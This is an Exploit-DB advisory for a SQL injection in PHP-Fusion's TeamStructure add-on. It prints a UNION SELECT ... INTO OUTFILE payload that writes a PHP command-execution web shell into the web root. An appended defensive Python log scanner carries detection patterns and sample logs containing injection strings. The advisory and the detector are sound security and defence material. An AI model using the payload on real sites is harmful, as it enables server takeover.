PHP-Fusion Teams Structure Infusion Addon SQL Injection

EDB-ID: 16004 CVE: 2011-0512 OSVDB-ID: 70451...
Author: Saif   Published: 2011-01-17
# Exploit Title: PHP-fusion Team Structure Infusion (All versions) SQL
# Date: 16-1-2010
# Author: Saif El-Sherei
# Software Link:
# Version: PHP-fusion (7.01..03), TeamStructure Infusion(all versions)
# Tested on: Firefox 3.0.15, , IE 8


Plugin that lets the site list all teams / clubs (e.g. football
or hockey) with their playing staff, and display the standings with
each team's position or a list of the best strikers of a championship.


The "team_id" variable is not properly sanitized before being used in an
SQL query in "team.php". The attack can be escalated, as shown in the second
PoC, to bypass PHP-Fusion's GET variable XSS filter by using backticks
instead of the brackets used in any PHP function call, in this case
shell_exec().


magic_quotes_gpc = Off

union select
union select '1','2','<?php $out=`id`;echo $out;
?>','4','5','6','7','8','9','10','11','12','13','14','15','16','17' into
outfile '/var/www/php-fusion/files/images/test.php


Saif El-Sherei
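
For defenders reviewing web server logs, the following added example (not part of the original advisory or of PHP-Fusion) flags requests to team.php whose team_id is not a plain integer and names the markers the advisory describes: union select, into outfile and backticks. It assumes a combined-format access log, an infusion path of /infusions/teams/, and that legitimate team_id values are purely numeric; all log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines; addresses, paths and values are made up.
SAMPLE_LOG = [
    '198.51.100.7 - - [17/Jan/2011:10:00:01 +0000] "GET /infusions/teams/team.php?team_id=4 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [17/Jan/2011:10:02:13 +0000] "GET /infusions/teams/team.php?team_id=-1%20UNION%20SELECT%201,2,3 HTTP/1.1" 200 734',
    '198.51.100.9 - - [17/Jan/2011:10:03:40 +0000] "GET /infusions/teams/team.php?team_id=1%20union%20select%20%60id%60%20into%20outfile%20%27/tmp/x%27 HTTP/1.1" 200 512',
    '198.51.100.7 - - [17/Jan/2011:10:04:02 +0000] "GET /infusions/teams/team.php?team_id=4abc HTTP/1.1" 200 734',
    '198.51.100.7 - - [17/Jan/2011:10:05:00 +0000] "GET /news.php?team_id=x HTTP/1.1" 200 900',
]

# Greedy match so a request target logged with raw spaces is still captured whole.
REQUEST_RE = re.compile(r'"(?:GET|POST) (.+) HTTP/[\d.]+"')
INDICATORS = {
    "union_select": re.compile(r"\bunion\b.+\bselect\b", re.I | re.S),
    "into_outfile": re.compile(r"\binto\s+(?:out|dump)file\b", re.I),
    "backtick": re.compile(r"`"),  # passes a filter that only looks for brackets
}

def is_valid_team_id(value):
    """Allowlist check (assumption: a team id is a short run of ASCII digits)."""
    return re.fullmatch(r"[0-9]{1,10}", value) is not None

def scan_line(line):
    """Return [(decoded team_id, [indicator names])] for a suspicious request, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.endswith("/team.php"):
        return None
    hits = []
    # parse_qs percent-decodes values, so encoded payloads are matched in clear text.
    for value in parse_qs(url.query, keep_blank_values=True).get("team_id", []):
        if is_valid_team_id(value):
            continue
        names = [n for n, rx in INDICATORS.items() if rx.search(value)]
        hits.append((value, names or ["non_numeric"]))
    return hits or None

def scan(lines):
    """Map 1-based line number -> findings for every flagged line."""
    return {i: f for i, line in enumerate(lines, 1) if (f := scan_line(line))}

if __name__ == "__main__":
    for lineno, findings in scan(SAMPLE_LOG).items():
        print(lineno, findings)
```

The same allowlist, applied in team.php before the value reaches the query, rejects every payload regardless of which characters a blacklist filter lets through.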